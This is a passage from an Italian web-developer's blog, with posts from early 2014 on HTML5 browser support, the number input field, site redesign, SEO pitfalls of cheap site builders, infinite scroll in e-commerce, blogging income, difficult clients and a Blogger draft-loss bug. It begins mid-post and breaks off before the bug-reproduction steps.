Questo limite non ha particolari conseguenze, anzi, usare troppi hastag potrebbe essere controproducente.

Un recente studio svolto da Socialbakers a.s. (una azienda che si occupa di misurazioni sui social network) ha infatti rilevato che aumentando il numero di hashtag si riduce il numero di interazioni.

Come mai troppi hashtag possono essere dannosi?

Questa considerazione, valida per tutti i social network, ha una motivazione molto semplice:

un uso eccessivo di hashtag potrebbe essere considerato una forma di spam da parte degli utenti dei social.

Gli hashtag sono un sistema che, in linea teorica, dovrebbe essere utile per categorizzare i post. Sono delle etichette che identificano l'argomento del post, quindi troppi hashtag possono creare confusione.

Ecco quindi che limitare l'uso degli hashtag è una buona abitudine per massimizzare l'efficacia dei post nei social network.

Il limite tecnico di 30 hashtag è quindi un vincolo che generalmente non comporta alcun problema visto che il numero consigliato è di un paio di hashtag per singolo post.

sabato 29 marzo 2014

Quanto è supportato HTML5 dai browser?

Il linguaggio HTML5 è in continua evoluzione e questo comporta un supporto non ancora ottimale da parte di praticamente tutti i browser.

Probabilmente, non essendoci ancora uno standard ben definito, gli sviluppatori non si sbilanciano troppo nell'implementare specifiche che potrebbero essere soggette a cambiamenti, pertanto la situazione è incerta.

A maggio del 2010 ho scritto un breve articolo dove sottolineavo questa situazione (HTML5, a che punto siamo?). Dopo circa quattro anni non è cambiato molto.

Recentemente ho pubblicato un post a proposito dei campi numerici in HTML5 il cui supporto è altalenante ed il comportamento è molto diverso tra browser e piattaforme diverse.

Oltre ai numerosi browser per PC, bisogna anche considerare le varie tipologie di piattaforme mobile e dei browser  è molto più rilevante e quindi ci si trova con una variabile ulteriore a cui far riferimento quando si sviluppa per il web.

Ad esempio il campo numerico sopracitato può alterare il tipo di tastiera di input visualizzata in uno smartphone e questo può causare delle differenze nell'esperienza d'uso in base al tipo di dispositivo e browser usato.

Per questo motivo è sempre consigliabile effettuare molti test quando si usano particolari funzionalità del linguaggio HTML5.

Lo stato del supporto ad HTML5

Vediamo quindi più in dettaglio come si comportano i browser nelle piattaforme più diffuse.

Per raccogliere i seguenti dati ho usato il sito html5test.com che, pur non essendo uno strumento ufficiale e riconosciuto dal consorzio w3c, offre delle indicazioni precise.

Questo sito assegna un punteggio al browser in base alle funzionalità ed alle caratteristiche supportate. Il massimo che si può ottenere è 555.

Ecco la classifica del supporto al linguaggio HTML5 dei browser più diffusi:

Classifica supporto HTML5 dei browser (Marzo 2014)
  1. Chrome 33 (OSX): 505
  2. Chrome 33 (Windows 8): 505
  3. Chrome 33 (Linux): 503
  4. Firefox 28 (OSX): 448
  5. Firefox 28 (Linux): 444
  6. Browser Android 4.4 stock: 428
  7. Firefox 28 (Windows 8): 428
  8. Safari iOS 7: 412
  9. Safari 7 (OSX): 397
  10. Opera 12.16 (Linux): 392
  11. Safari iOS 6: 387
  12. IE 11 (Windows 8): 376
  13. Browser Android 4.0 stock: 272
  14. Browser Android 2.3.7 stock: 187
Al primo posto troviamo Google Chrome, mentre in fondo alla classifica c'è il browser stock per Android.

Da questi numeri si possono notare le differenze che ci sono nelle varie combinazioni di sistema operativo e browser. Ad esempio Firefox 28 ottiene dei risultati diversi in base al sistema operativo:
  • Firefox 28 (Linux): 444
  • Firefox 28 (Windows 8): 428
  • Firefox 28 (OSX): 448
Un altro sito che si può usare per ottenere un po' di informazioni sullo stato dei vari browser e piattaforme è caniuse.com.
Anche in questo caso si nota come il supporto ad HTML5 sia spesso incompleto.

Analisi dell'HTML5 e diffusione dei browser

Arrivati a questo punto è interessante verificare la percentuale di utilizzo dei diversi browser ed incrociare i risultati con i dati precedenti.

All'inizio del 2014 Google Chrome si conferma come maggior browser per il desktop (55%), seguito da Firefox (27%) e quindi da Internet Explorer (10%) e Safari (4%).

Nel lato mobile abbiamo circa un pareggio (dipende molto dalle fonti delle statistiche) tra Android e IOS, anche se la maggior parte degli utenti Android ha la versione 4.0-4.2 e circa il 20% dei dispositivi Android ha la versione Gingerbread (2.3), il cui supporto ad HTML5 è il più basso.

Tenendo conto che la navigazione in rete, ad oggi, è svolta metà tramite desktop/notebook e metà tramite tablet e smartphone, si evidenzia come solo un 25% del totale dei navigatori usa un browser ed una piattaforma con una buona compatibilità con il linguaggio HTML5, ovvero Google Chrome su desktop.

È anche vero che molte delle caratteristiche non supportate sono working draft o comunque delle funzionalità molto particolari, ma comunque i risultati ottenuti dai test confermano come il linguaggio HTML5 sia ancora molto giovane e probabilmente serviranno ancora diversi anni prima di avere una situazione realmente stabile, crossbrowser e crossplattform.

lunedì 10 febbraio 2014

Progettare la nuova versione di un sito web

In questi giorni sto raccogliendo un po' di idee per aggiornare la grafica e la struttura di un mio blog (http://www.finex.org).

Per l'occasione ho pensato di mettere per iscritto alcune considerazioni riguardanti il processo di aggiornamento di un sito web.

Perché aggiornare un sito web?

Ci sono molti motivi per aggiornare un sito web. In questo caso particolare le motivazioni sono sia di natura tecnica che di natura personale.

Creare un sito responsive

Da un punto di vista tecnico l'esigenza principale è quella di rendere il sito responsive, in modo che sia ben leggibile anche attraverso dispositivi mobile come iPhone, IPad e tutta la famiglia di terminali Android e Windows Phone.

La navigazione da mobile è forse il motivo principale che incentiva (o che dovrebbe incentivare) il rifacimento di molti siti web in questo periodo.

Riorganizzare le informazioni

Un altro fattore tecnico che vorrei migliorare è la gestione dei tag e l'aggiornamento del sito è una buona occasione per agire anche su questo fronte.

Spesso in passato c'è stato un abuso di tag e categorizzazioni che però non hanno portato un reale contributo nell'organizzazione efficiente delle informazioni. Quindi ripensare a come si strutturano e si archiviano i dati in rete può portare a dei miglioramenti sia nell'usabilità che nell'indicizzazione e nella reperibilità delle informazioni.

Aggiornare l'aspetto grafico del sito

Per quanto riguarda le motivazioni più personali devo ammettere che c'è il desiderio di ammodernare la grafica per cambiare un po' l'impatto visivo del sito ed in modo da renderlo più pulito ed efficiente da un punto di vista "comunicativo".

Anche le esigenze grafiche e di comunicazione sono una costante che si riscontra in fase di aggiornamento di un sito web.

A volte la richiesta può essere puramente estetica, ma molte altre volte, rivedere la grafica e le modalità di trasmissione delle informazioni (soprattutto in ambito promozionale) è un vantaggio innegabile.

Migliorare l'infrastruttura tecnologica

Infine, nel sito in esame, vorrei anche aggiornare la piattaforma CMS usata (al momento Drupal 6), giusto per sfizio più che vera necessità.

L'aggiornamento della piattaforma tecnologica su cui si basa un sito web può offrire diversi vantaggi. Eccone alcuni:
  • Miglioramento della compatibilità con i nuovi browser e dispositivi hardware.
  • Aumento delle prestazioni del sito grazie alla riduzione tempi di attesa ed all'ottimizzazione delle pagine.
  • Nel caso di un CMS l'aggiornamento  può essere utile anche per risolvere eventuali problemi di sicurezza.
  • Aggiunta di funzionalità.

Come si progetta l'aggiornamento di un sito web?

Dopo aver identificato gli aspetti in cui intervenire è necessario studiare le modalità operative per effettuare l'aggiornamento.

Si può agire effettuando le varie modifiche grafiche o tecniche nel sito esistente, oppure si può avere un approccio più drastico con un rifacimento completo del sito, dalla programmazione fino alla grafica, seguito da una migrazione dei dati dal vecchio sito al nuovo sito.

Questa scelta dipende da molti fattori, in particolare dall'entità delle modifiche da apportare.

Solitamente, se si vuole ottenere un risultato significativamente migliore rispetto al vecchio sito, sarà molto probabile che si scelga la seconda opzione.

Per progettare la nuova versione di un sito web è molto utile analizzare il vecchio sito per comprendere quali erano i punti di forza e le debolezze, in modo da ottimizzare i primi ed eliminare i secondi.

Inoltre va anche considerata una pianificazione opportuna delle varie attività. In particolar modo del momento in cui il vecchio sito web sarà sostituito con la nuova versione.

La migrazione e la sincronizzazione dei dati è infatti uno degli aspetti più critici di tutto il processo di aggiornamento.

Per evitare disservizi il passaggio alla nuova versione va quindi studiato nei minimi dettagli.

Infine va ricordato che l'aggiornamento di un sito web può avere delle implicazioni anche dal punto di vista SEO, pertanto si raccomanda di prestare molta attenzione per non causare problemi al posizionamento ed all'indicizzazione nei motori di ricerca.

domenica 9 febbraio 2014

Campo numerico in HTML5

Tra le novità del linguaggio HTML5, quello che ormai è diventato lo standard de facto per i moderni siti web (anche se non è ancora ufficialmente stabile) troviamo la possibilità di specificare la tipologia di dati che possono essere immessi nei controlli input.

In particolare i nuovi tipi di input HTML5 sono:
  • colore (color)
  • data (date)
  • data e ora (datetime)
  • data e ora locali (datetime-local)
  • indirizzo email (email)
  • mese (month)
  • numero (number)
  • intervallo (range)
  • ricerca (search)
  • numero di telefono (tel)
  • orario (time)
  • indirizzo web (url)
  • settimana (week)
Il tipo di input "number" permette di definire dei parametri per i numeri che possono essere inseriti:
  • max: ovvero il valore massimo che il campo può accettare
  • min: il valore minimo inseribile
  • step: nel caso il browser supporti questa opzione, come ad esempio Google Chrome, viene mostrata una UI speciale con due pulsanti: uno per incrementare ed uno per diminuire il valore con il "passo" (step) specificato (vedi immagine)
  • value: il valore predefinito del campo.
Esempio campo numerico con "step"

Ecco un esempio di come si può usare questo tag:

<input type="number" name="nome_del_campo" min="0" max="10" step="1" value="5">

Inoltre, come molti altri tag HTML5, anche il tipo di input "number" non è compatibile con tutti i browser.

Ad esempio il supporto sarà gestito da Firefox solo dalla versione 28, mentre su Internet Explorer 10 è supportato solo parzialmente.

Quando si usa questo campo è necessario effettuare un po' di test con diversi browser e piattaforme per verificarne il funzionamento a causa del supporto un po' scarso. Ad esempio si potrebbero rilevare anomalie nell'inserimento di numeri con decimali.

sabato 8 febbraio 2014

L'arroganza dei clienti

Il web è un mondo strano. Uno degli aspetti che continua a sorprendermi è l'arroganza di molti clienti.

Solitamente quando una persona si rivolge ad un professionista "off line", ad esempio un meccanico, un avvocato, un idraulico e così via, è il professionista di turno che indicherà il costo della prestazione e le tempistiche.

Perché allora quando si chiede l'intervento di un professionista che si occupa di web (o comunque più in generale di informatica) si ha la pretesa di indicare al fornitore i tempi della durata del lavoro ed addirittura i costi?

Quali sono le cause di questo comportamento?

Mi chiedo spesso quali siano le cause di questo comportamento e nel corso del tempo ho notato diverse tipologie di clienti.

Una delle cause principali è una profonda ignoranza che viene mascherata con l'arroganza di saperne di più del fornitore.

Inoltre è ancora diffusa la percezione che chi opera nel mondo dell'informatica sia solo uno "smanettone" che lavora in scantinato e si può accontentare della gloria.

Abbiamo poi il caso del cliente che «L'amico di mio cugino ha detto che è una cosa facile»...

In molti altri casi i clienti chiedono un intervento a decine di fornitori indicando già il budget sperando che almeno uno sia nella condizione di dover accettare anche un lavoro sottopagato. Questi clienti si appellano alle regole del "libero mercato", io invece chiamo la situazione "sfruttamento".

Probabilmente ci sono anche altre motivazioni, ma credo che queste siano le principali, o perlomeno sono quelle in cui mi sono imbattuto più frequentemente.

venerdì 7 febbraio 2014

Concorso per promuovere i giovani talenti facendo spam

Oggi ho scoperto l'ennesimo concorso che si propone di promuovere giovani talenti che vogliono creare innovazione attraverso il web grazie ad un "acceleratore di startup", termine che adesso va di moda per ottenere un po' visibilità, soprattutto nei media tradizionali.

Come spesso capita con gli incubatori di startup, mi sembra più una farsa. Il sospetto nasce già dalla semplice navigazione dei vari siti web creati per l'occasione: la loro qualità non è coerente con la mission dichiarata, ma soprattutto lo si capisce da come il tutto è promosso: grazie ad azioni di spamming.

Se il modo migliore per far conoscere un'iniziativa che mira alla formazione, all'innovazione ed alla costruzione di un web migliore è attraverso spam, direi che si è partiti con il piede sbagliato.

Comunque sembra che, a livello nazionale, il progetto non sia ancora riuscito ad ottenere visibilità. Vorrei anche vedere: la rete non è un luogo dove basta mandare migliaia di messaggi casualmente per avere un riscontro positivo.

È anche vero che spammando a destra e manca qualche risposta magari si ottiene, ma ciò avviene a discapito della reputazione e dell'affidabilità. Inoltre in questo modo non si ottimizza per niente l'investimento promozionale, ovviamente questo ragionamento è valido per chi ha dei buoni propositi.

sabato 1 febbraio 2014

Ritocchi grafici al template di Blogger

Oggi ho ritagliato qualche minuto di tempo per sistemare alcuni dettagli grafici di questo blog.

La piattaforma Blogger permette di modificare sia il template HTML delle pagine, che i fogli di stile (CSS) con estrema semplicità.

La modifica degli stili principali del blog avviene attraverso un pannello di configurazione grafico e, nel caso di esigenze particolari, si può inserire manualmente il codice CSS per i ritocchi finali.

È bastato modificare il tipo di font, la dimensione del testo e dei titoli, il colore dei link ed un po' di margini per rendere il blog molto più leggibile ed ordinato.

Con un po' di pazienza è possibile ottenere dei risultati decisamente elaborati, ma per oggi va bene anche così.

lunedì 20 gennaio 2014

Guadagnare con un blog

È possibile guadagnare con un blog amatoriale e arrotondare lo stipendio?

Ottenere dei risultati in questo senso potrebbe essere un'impresa difficile: per guadagnare attraverso il web è necessario pianificare con molta attenzione ogni aspetto del sito internet, soprattutto se lo scopo è racimolare delle entrate ben superiori a qualche decina di euro al mese.

Esistono diversi modi per guadagnare online:

  • attraverso la vendita di prodotti
  • vendendo servizi
  • grazie alla vendita di spazi pubblicitari all'interno del sito.
Nel caso di un blog i primi due punti sono automaticamente esclusi, a meno che il blog non sia un pretesto per vendere prodotti/servizi, ma non è questo il tema del post. Rimane quindi la vendita degli spazi pubblicitari, indirettamente attraverso servizi come Google AdSense, o direttamente, ma per fare questo è necessario incentivare i possibili inserzionisti.

Come aumentare le entrate di un blog?

L'entità del guadagno è proporzionale al numero di visitatori, però se il blog è amatoriale ed il traffico di utenti è limitato come si può fare?

Bisogna cercare di aumentare il traffico e, se possibile, cercare di intercettare le persone realmente interessate agli argomenti proposti scrivendo post originali e frequenti per non far scemare l'attenzione del pubblico.

Per fare questo vanno creati contenuti di qualità e messe in atto delle strategie di comunicazione che coprono anche i social network estendendo la presenza online ben oltre al singolo blog.

Inoltre la produzione di contenuti, solitamente testi e video, non si deve limitare ad una prima fase iniziale di startup, ma è un processo che dovrà continuare per tutta la durata del progetto.

Per ottenere un traffico che sia significativo agli occhi dei possibili inserzionisti non basta scrivere un articolo o due alla settimana (a meno che non siano di un settore così di nicchia e siano decisamente interessanti ed utili), ma è necessario un impegno molto maggiore.

Quindi si raggiunge un vicolo cieco: stiamo creando un blog amatoriale ma dobbiamo gestire il sito e produrre contenuti in maniera professionale.

Il sogno di guadagnare attraverso un blog amatoriale (e senza far fatica) è infranto?

Realisticamente parlando credo proprio di sì, o perlomeno è così nella maggior parte dei casi.

Per ottenere dei risultati tangibili è necessario investire tempo ed altre risorse, trasformando di fatto un hobby in un lavoro e quindi la domanda diventa: «Si può guadagnare attraverso un blog "professionale"?».

In questo caso ci sono molte più probabilità.

giovedì 16 gennaio 2014

Ecommerce usabili o alla moda?

Una delle mode più in voga nei nuovi siti web è l'uso del cosiddetto infinite scroll: invece di suddividere un archivio o i risultati di una ricerca in più pagine, il caricamento avviene man mano che l'utente scorre in basso.

È il funzionamento adottato da molti big come Facebook, Pinterest, Twitter ed anche Google+, solo per citare alcuni esempi.

In molte occasioni questo sistema può essere comodo da usare, ma non per questo è efficace in ogni situazione.

Ad esempio negli e-commerce questa tipologia di navigazione è controproducente se usata nelle pagine del catalogo prodotti o nella ricerca prodotti in quanto rallenta molto la navigazione e quindi si rischia di farli uscire dal sito prima del previsto con un impatto negativo nel CTR.

In rete si trovano diversi report proprio a proposito di questa metodologia di visualizzazione ed in tutti i casi è stato rilevato un calo molto elevato di conversioni (ovvero di utenti che entrano nel sito e procedono all'acquisto).

I difetti principali dell'infinite scroll all'interno di un e-commerce sono i seguenti:
  • Lentezza nella lettura dei prodotti a causa delle continue interruzioni dovute al caricamento allo scroll.
  • Quando si entra nella pagina di un prodotto e si vuole tornare indietro alla pagina del catalogo si riparte dall'inizio e non dal punto in cui si era arrivati precedentemente.
  • Non è possibile salvare un segnalibro preciso.
  • Non è possibile effettuare una ricerca completa all'interno della pagina finché non sono stati caricati tutti i risultati.
Tutti questi fattori provocano delle difficoltà nella navigazione e nell'utilizzo dell'E-commerce e, come ben sappiamo, agli utenti non piace stare nei siti web difficili da usare e che non forniscono delle risposte adeguate nei tempi e nei modi abituali.
Quindi, prima di introdurre modifiche all'interfaccia utente, soprattutto in sistemi dove i paradigmi di interazione sono ben noti e consolidati, è sempre meglio effettuare dei test approfonditi in modo da evitare problemi che potrebbero essere decisamente negativi.

domenica 12 gennaio 2014

Servizi per creare siti web economici: le ottimizzazioni SEO che non ci sono

Web marketing e SEO di bassa qualità

Sul web esistono molti servizi che offrono la creazione di siti web molto economici. Addirittura gratuiti se si scende a compromessi.

Tra questi ho scoperto una startup italiana che propone la realizzazione in pochi minuti di un sito web con moltissime funzionalità e soprattutto ottimizzato per i motori di ricerca ed attento alle nuove tecnologie.

Incuriosito dalla pubblicità ho approfondito la questione e, come sospettavo fin da subito, i risultati che si ottengono usando questa piattaforma non sono affatto professionali e tanto meno ottimizzati per i motori di ricerca.

Lo scopo di questo articolo non è fare pubblicità negativa a questa azienda, ma di analizzare un esempio di servizio che non ritengo di qualità, quindi non farò riferimenti diretti all'azienda.

In particolare voglio soffermarmi sulle caratteristiche tecniche e SEO che ho osservato.

Partiamo dal sito web di presentazione del servizio. Questo sito contiene diversi problemi/errori. Ad esempio non è responsive friendly, ciò significa che la navigazione tablet o da smartphone non è ottimizzata. Inoltre all'interno del sito ho trovato alcuni "hack" che denotano una scarsa competenza di programmazione web.

Uno di questi è legato ad uno slideshow mal programmato che in una diapositiva contiene dei link, quando la diapositiva è nascosta i link sono comunque cliccabili in quanto viene solamente cambiata l'opacità.

Passiamo poi al SEO: le ottimizzazioni pubblicizzate sono solo uno specchietto per le allodole.

Già a prima vista ci si accorge che i siti non sono ottimizzati, ma per non trarre delle conclusioni affrettate ho voluto esaminare con più attenzione il servizio, pertanto ho navigato ed analizzato molti siti web realizzati tramite questa piattaforma.

In tutti i siti che ho testato ho riscontrato gli stessi problemi che derivano da come è stato progettato ed implementato il sistema.

Le pagine dei siti web non hanno contenuti indicizzabili dai motori di ricerca!

Il problema principale, e che ritengo gravissimo, è che tutti i contenuti dei siti web creati attraverso questa piattaforma non sono presenti nel codice HTML delle pagine, ma vengono caricati tramite JS. Cliccando i link e le voci di menu i contenuti cambiano senza il ricaricamento delle pagine.

Ciò comporta l'impossibilità da parte dei motori di ricerca di indicizzare i contenuti delle pagine. Ho fatto più test su Google e ne ho avuto conferma al 100%.

È curioso notare che le pseudo-pagine del sito (identificate da un url fragment) sono inserite in una sitemap, pertanto Google effettivamente le indicizza ma per ogni pagina ha solo il titolo e la meta descrizione.


In effetti, leggendo nella descrizione del servizio, alla voce "Search Engine Friendly" è indicato che le tecniche SEO sono associate alla possibilità inserire le keyword, non si accenna al posizionamento dei contenuti, anche se più volte si promuove la piattaforma come ottimale per il posizionamento.

Chi si occupa di SEO dovrebbe sapere benissimo che per prima cosa i contenuti di un sito web devono poter essere indicizzati da google e che il meta tag "keyword" (abbondantemente usato in questi siti) non è più utile ai fini del posizionamento già da alcuni anni. Invece questa "startup" sembra non esserne al corrente.

Non riesco a capire se questo progetto è stato creato per spennare soldi a chi vuole spendere poco e si accontenta di avere un risultato di bassa qualità, oppure se dietro a tutto ci sono altri interessi.

Ma visto che lo scopo di questo articolo è puramente "tecnologico", mi fermo qui e mi limito ad osservare come la qualità di molte proposte che si trovano sul web sia decisamente troppo bassa.

venerdì 10 gennaio 2014

L'evoluzione della rete con l'uso dei social

Evoluzione social network e web marketing

I social network stanno evidenziando un fenomeno che negli anni scorsi si riscontrava spesso all'interno dei classici forum: molte persone invece di usare i motori di ricerca o di leggere la documentazione preferiscono mandare un messaggio di aiuto sul web, sperando che qualcuno risponda con delle informazioni utili.

Questa è l'impressione che ho navigando ed usando la rete, ma esistono dei riscontri reali sulla diminuzione dell'uso dei motori di ricerca?

E se i motori di ricerca comunque non rilevassero un calo di ricerche, il fenomeno come può essere trattato ai fini del web marketing?

Tutto e subito, RTFM:

In questa analisi, al momento piuttosto empirica, possiamo classificare più tipologie di utenti:
  • I pigri che non hanno voglia di fare un minimo di fatica per documentarsi in maniera autonoma.
  • Gli approfittatori che, anch'essi, non vogliono fare fatica.
  • Chi ignora l'esistenza dei motori di ricerca (e qui noto molto spesso persone giovanissime).
  • Chi conosce i motori di ricerca ma non li sa usare.
  • Chi dopo aver fatto ricerche e dopo essersi documentato non ha trovato delle risposte e quindi spera di trovare qualcuno in grado di aiutarlo.
Fino a qualche anno fa la risposta classica a chi apparteneva a queste categorie (eccetto l'ultima) era RTFM, ovvero un invito a leggere la documentazione o a fare una semplice ricerca prima di scomodare gli altri.

Ovviamente il buonismo dilagante ha ridotto parecchio questo tipo di risposta, di fatto favorendo e giustificando la pigrizia o l'ignoranza.

Giusto qualche minuto fa ho letto un post su Google+ di un "web developer" che chiedeva una informazione tecnica che dovrebbe essere nota a chiunque svolga questo lavoro. Uno sviluppatore web dovrebbe essere in grado di trovare una soluzione in completa autonomia ed in tempi rapidissimi nel caso gli mancasse tale nozione. Ed invece vuoi per comodità o per l'incapacità di saper usare i motori di ricerca, ha preferito usare Google+... e qualcuno gli ha pure risposto!

Mentre la scorsa settimana sono stato contattato da un conoscente che mi chiedeva se gli potevo dare un suggerimento per dove acquistare un detergente, bastava una ricerca su Google ed invece ha usato Facebook.

Questo fenomeno come influisce nel Web Marketing e nella SEO?


Queste mie osservazione si basano sull'esperienza diretta che ho quotidianamente nell'uso della rete, ma non sono il primo che ha notato come i social network siano una fonte per la ricerca di informazioni.

Esistono già alcuni studi che evidenziano come la ricerca tradizionale spesso sia sostituita, o comunque affiancata, dalla ricerca attraverso i social. Ad esempio lo scorso anno è stato pubblicato un report da parte della nota azienda di ricerche Forrester che sottolinea appunto questo trend.

Una percentuale sempre più elevata di utenti raggiunge i siti web passando per i social network.

Ecco quindi che quando si vuole promuovere online un brand, un prodotto, dei servizi o anche un negozio, è sempre più importante tenere in considerazione i social network e non fossilizzarsi solamente sulle attività di posizionamento nei motori di ricerca.

Ovviamente il web marketing fatto usando i social network non è adatto ad ogni tipologia di azienda, però in moltissimi casi, se strutturato, pianificato e seguito in maniera corretta, può offrire dei risultati molto interessanti.

giovedì 9 gennaio 2014

Risparmiare sul sito web: le conseguenze

Risparmiare sul web, le conseguenze

Qualche mese fa sono stato contattato per il rifacimento di un sito web di una azienda che ha una particolare linea di prodotti da promuovere online.

Il sito da rifare era veramente messo male: pochissime pagine con una grafica imbarazzante e contenuti inesistenti assieme ad una sotto specie di e-commerce dal dubbio funzionamento.

Rifare il sito era proprio una buona idea.

Così ho inviato il preventivo per il nuovo sito web, tra l'altro ad un prezzo piuttosto contenuto. L'offerta comprendeva lo sviluppo di una grafica responsive, ottimizzazioni SEO ed un semplice e-commerce per ordinare i prodotti.

Passano alcuni mesi e non ricevo risposta. Così, per curiosità, provo a guardare il sito e scopro che nel frattempo è stato rifatto, sono le regole del gioco, non è un problema... ma cosa vedo?

Orrore!

Il nuovo sito web ha peggiorato incredibilmente la situazione. Subito ho pensato di aver sbagliato indirizzo, e invece no, l'indirizzo era giusto.

Una accozzaglia di elementi sparsi nelle pagine senza una linea logica e senza alcuna attenzione né alla grafica né all'usabilità.

Elementi completamente sconnessi tra loro, una struttura di navigazione inesistente, la sezione e-commerce graficamente incoerente con tutto il resto del sito e addirittura con contenuti incompleti.

Chi ha sviluppato il sito non è nemmeno stato in grado di implementare un modulo di contatto decente ed ha incluso il form attraverso una piattaforma esterna.

Insomma, un completo disastro!

Ricapitolando:
  • Miglioramenti a livello di immagine: zero
  • Miglioramenti di usabilità: zero
  • Ottimizzazioni per mobile: zero
  • Miglioramenti SEO: zero
  • Miglioramenti per aumentare le vendite: zero
Quindi è stato investito del tempo e (forse) anche del denaro per non avere alcun miglioramento.

Anzi, oltre a non aver ottenuto miglioramenti, oserei affermare che un sito di questo tipo è addirittura penalizzante per la reputazione dell'azienda e del prodotto.

A questo punto ho due ipotesi:

La prima è che il sito sia stato implementato da un truffatore. È l'unico termine che mi viene in mente per descrivere chi può vendere un sito sviluppato in questo modo.

La seconda è che il sito sia stato sviluppato "in casa", magari con l'aiuto di qualche amico o di qualche conoscente. Ho già trattato questo argomento in passato, ad esempio nell'articolo dedicato ai template web pronti all'uso ed anche in vecchi post come quello sulla mancanza di professionalità e quello sui motivi per evitare i siti fatti in casa.

Spero sinceramente che il sito che ho descritto oggi faccia parte della seconda casistica.

Infine, come spesso accade, mi chiedo se i proprietari si rendono conto di avere un sito web inguardabile e inusabile oppure se magari sono orgogliosi di avere un nuovo sito senza aver speso più di tanto e pensano di essere "furbi".

A volte è meglio non avere affatto un sito web piuttosto che fare una figuraccia del genere e demolire l'immagine e la reputazione acquisita nel passato.

mercoledì 8 gennaio 2014

Perdita di dati su Blogger a causa di un bug

Un bug di Blogger può causare la perdita di dati (quasi) irreversibile nel caso in cui si annullino ripetutamente le operazioni di un un post non ancora pubblicato.

È quello che ho scoperto a mie spese proprio oggi: stavo annullando le ultime modifiche da un post in modalità "bozza" (draft) con la scorciatoia CTRL+Z e tutto ad un tratto ho visto l'articolo intero sparire, dopo qualche istante la funzionalità di salvataggio automatico ha salvato l'articolo e non sono più stato in grado di ripristinare il testo.

È facile riprodurre questo bug, basta procedere in questo modo: